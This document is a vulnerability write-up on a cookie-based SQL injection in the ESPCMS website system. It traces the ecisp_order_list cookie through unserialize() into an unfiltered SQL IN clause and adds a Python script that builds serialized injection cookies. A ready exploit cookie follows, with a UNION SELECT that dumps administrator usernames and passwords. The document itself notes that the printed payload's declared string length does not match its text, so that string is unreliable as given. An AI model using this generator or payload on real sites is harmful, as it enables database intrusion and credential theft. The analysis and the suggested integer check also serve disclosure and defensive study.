0x00 Introduction:
Yisi ESPCMS is an enterprise website management system built on the LAMP stack. The vendor describes it as easy to operate, powerful, stable, scalable and secure, convenient for secondary development and later maintenance, and intended to let you build a professional enterprise website quickly.
0x01 Vulnerability Analysis:
function in_list() {
    parent::start_pagetemplate();
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    $cartid = $this->fun->accept('ecisp_order_list', 'C'); // 'C': read from $_COOKIE['ecisp_order_list']
    $cartid = stripslashes(htmlspecialchars_decode($cartid));
    $uncartid = !empty($cartid) ? unserialize($cartid) : 0; // $cartid must be a valid PHP-serialized value
    if ($uncartid && is_array($uncartid)) {
        $didarray = $this->fun->key_array_name($uncartid, 'did', 'amount'); // re-indexed by each row's 'did'
        $didlist = $this->fun->format_array_text(array_keys($didarray), ','); // the 'did' values, comma-joined
        if (!empty($didlist)) {
            $db_table = db_prefix . 'document';
            $db_where = "isclass=1 AND isorder=1 AND did in ($didlist) order by did DESC";
            $sql = "SELECT did, lng, pid, mid, aid, tid, sid, fgid, linkdid, isclass, islink, ishtml, ismess, isorder, purview, recommend, tsn, title, longtitle, color, author, source, pic, link, oprice, bprice, click, addtime, template, filename, filepath FROM $db_table WHERE $db_where"; // SQL built by string concatenation
            $rs = $this->db->query($sql); // $didlist reaches the query with no filtering
            // ... the rest of the method renders $rs
        }
    }
}

The value of $_COOKIE['ecisp_order_list'] is thus used to build the SQL statement and is executed without any filtering: whatever each row's 'did' element contains is concatenated straight into the IN (...) list. This is a cookie injection.
0x02 Difficulties:
Before it reaches the query, $_COOKIE['ecisp_order_list'] passes through htmlspecialchars_decode(), stripslashes(), unserialize(), key_array_name(), array_keys() and format_array_text().
stripslashes() removes the backslashes that magic_quotes_gpc adds, so the quotes in the injection survive regardless of the GPC setting, and htmlspecialchars_decode() turns HTML entities back into the raw characters.
What makes the exp harder to build is unserialize(): the cookie value must be something PHP's serialize() could have produced, i.e. a:N:{...} for arrays, s:N:"..." for strings where N is the exact byte length, and i:N; for integers. If any length is off by one, unserialize() returns false, is_array() fails, and the SQL is never built. Only the value of each row's 'did' element ends up in the query, so the injection has to live in that string. (I had not fully worked out this format when writing this.)
I got a working exp with some luck and a little technique; the method is not spelled out here. Print the return value of each function in the chain to see what it expects, or work the rules out from the exp below.
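As an added example that is not part of the original write-up or of ESPCMS, the following Python replays the cookie pipeline from 0x01 and builds a payload in the format 0x02 describes. The PHP-serialization encoder and parser are minimal ones written for this example; key_array_name() and format_array_text() are models of the ESPCMS helpers, assumed from how in_list() consumes their results (re-index rows by 'did', join the keys with commas); the hardened variant is a suggestion, not a vendor patch.

```python
"""Replay of the ecisp_order_list cookie pipeline from in_list(): build a
serialized cart whose 'did' string carries SQL, then show what reaches the
WHERE clause.  Added example, not ESPCMS code.  key_array_name() and
format_array_text() are assumed models of the ESPCMS helpers."""
from urllib.parse import quote, unquote_plus


def php_serialize(value):
    """Serialize bool/int/str/dict as PHP's serialize() does.  s:N: is a byte
    count, which is the detail that breaks hand-edited payloads."""
    if isinstance(value, bool):
        return 'b:%d;' % int(value)
    if isinstance(value, int):
        return 'i:%d;' % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode('utf-8')), value)
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return 'a:%d:{%s}' % (len(value), body)
    raise TypeError('unsupported type %r' % type(value))


def php_unserialize(data):
    """Parse the a/s/i/b subset of PHP's format (all this cookie needs).
    As strict as PHP: a wrong s:N: length or bad framing is an error, where
    real unserialize() returns false and in_list() goes no further."""
    data = data.encode('utf-8') if isinstance(data, str) else data

    def parse(pos):
        tag = data[pos:pos + 1]
        if tag in (b'i', b'b'):
            end = data.index(b';', pos)
            num = int(data[pos + 2:end])
            return (bool(num) if tag == b'b' else num), end + 1
        if tag == b's':
            colon = data.index(b':', pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2                      # skip ':"'
            if data[start + length:start + length + 2] != b'";':
                raise ValueError('declared length %d does not match string' % length)
            return data[start:start + length].decode('utf-8'), start + length + 2
        if tag == b'a':
            colon = data.index(b':', pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                        # skip ':{'
            items = {}
            for _ in range(count):
                key, pos = parse(pos)
                items[key], pos = parse(pos)
            if data[pos:pos + 1] != b'}':
                raise ValueError('array not closed at offset %d' % pos)
            return items, pos + 1
        raise ValueError('unsupported type tag %r at offset %d' % (tag, pos))

    value, end = parse(0)
    if end != len(data):
        raise ValueError('trailing bytes after offset %d' % end)
    return value


def key_array_name(rows, keyname, valuename):
    """Assumed model of ESPCMS key_array_name(): {row[keyname]: row[valuename]}."""
    return {row[keyname]: row[valuename] for row in rows.values()}


def format_array_text(items, sep):
    """Assumed model of ESPCMS format_array_text(): join, no quoting or casting."""
    return sep.join(str(item) for item in items)


def where_clause_for_cookie(cookie_value):
    """Replay in_list() on an already URL-decoded cookie value and return the
    WHERE clause it would hand to $this->db->query()."""
    uncartid = php_unserialize(cookie_value)
    didarray = key_array_name(uncartid, 'did', 'amount')
    didlist = format_array_text(didarray.keys(), ',')
    return 'isclass=1 AND isorder=1 AND did in (%s) order by did DESC' % didlist


def where_clause_for_encoded_cookie(encoded):
    """Same, starting from the URL-encoded form sent on the wire ('+' is a space)."""
    return where_clause_for_cookie(unquote_plus(encoded))


def hardened_where_clause_for_cookie(cookie_value):
    """Minimal fix on the SQL side (suggested here, not a vendor patch): every
    did must be an integer before it is interpolated.  Not calling
    unserialize() on cookie data at all is the other half of a real fix."""
    uncartid = php_unserialize(cookie_value)
    didarray = key_array_name(uncartid, 'did', 'amount')
    dids = []
    for did in didarray:
        if not str(did).isdigit():
            raise ValueError('rejected non-numeric did %r' % (did,))
        dids.append(str(int(did)))
    return 'isclass=1 AND isorder=1 AND did in (%s) order by did DESC' % ','.join(dids)


def build_cookie(did, amount=1):
    """One-row cart keyed 'k23' as in the write-up's exp; did may be an int
    (normal use) or a string carrying SQL.  Returns (serialized, url_encoded)."""
    serialized = php_serialize({'k23': {'did': did, 'amount': amount}})
    return serialized, quote(serialized, safe='')


if __name__ == '__main__':
    # Constructed sample input: a normal cart row, then the injection shape from 0x03.
    normal, _ = build_cookie(24)
    print(where_clause_for_cookie(normal))
    inj = '24) and 1=2 union select 1,2 from t where 1 in (1'
    serialized, encoded = build_cookie(inj)
    print(serialized)
    print('Cookie: ecisp_order_list=' + encoded)
    print(where_clause_for_cookie(serialized))
    try:
        hardened_where_clause_for_cookie(serialized)
    except ValueError as err:
        print('hardened:', err)
```

build_cookie() computes the s:N byte count for you, which is the part that is easiest to get wrong by hand, and php_unserialize() fails on a mismatch just as PHP's unserialize() returns false. Feeding it the decoded payload from 0x03 as reproduced on this page raises an error: the quoted query text is 147 bytes while the payload declares s:159, so recount the length before reusing that string.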
0x03 EXP:
Cookie value as sent (URL-encoded):
a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+sources+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d
Decoded:
a:1:{s:3:"k23";a:2:{s:3:"did";s:159:"24) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,password,username,19,20,21,22,23,24,25,26,27,28,29,30,31 from sources where 1 in (1";s:6:"amount";i:1;}}
The 'did' string opens with "24)" to close the IN (...) list and ends with "where 1 in (1" so that the ") order by did DESC" appended by in_list() still parses. The UNION selects 31 columns to match the 31 columns of the original SELECT; password and username sit at positions 17 and 18, i.e. the tsn and title columns of the result set.
0x04 Usage:
To avoid lowering the bar for exploitation any further (it is already low enough), the exploitation steps are not shown one by one.
0x05 Demo:
Injecting to obtain administrator information:
The official site's backend:
0x06 Ad Time:
Taoyuan magazine is accepting submissions on an ongoing basis; mail: lovelessyuyu353@qq.com